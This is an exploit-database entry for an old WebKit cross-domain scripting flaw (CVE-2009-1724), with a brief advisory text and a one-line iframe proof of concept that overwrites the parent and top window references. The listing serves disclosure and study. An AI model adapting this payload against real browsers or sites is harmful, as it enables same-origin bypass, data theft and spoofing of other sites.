WebKit - 'parent/top' Cross Domain Scripting
| EKU-ID: 37923 | CVE: CVE-2009-1724;OSVDB-55738 | OSVDB-ID: |
| Author: Gareth Hayes | Published: 2009-05-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 37923 | CVE: CVE-2009-1724;OSVDB-55738 | OSVDB-ID: |
| Author: Gareth Hayes | Published: 2009-05-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/35441/info WebKit is prone to a cross-domain scripting vulnerability. A remote attacker can exploit this vulnerability to bypass the same-origin policy and obtain potentially sensitive information or launch spoofing attacks against other sites. Other attacks are also possible. <iframe src="http://www.example.com/safari/safari2.html" onload="this.contentWindow.parent=this.contentWindow.top=alert;"></iframe>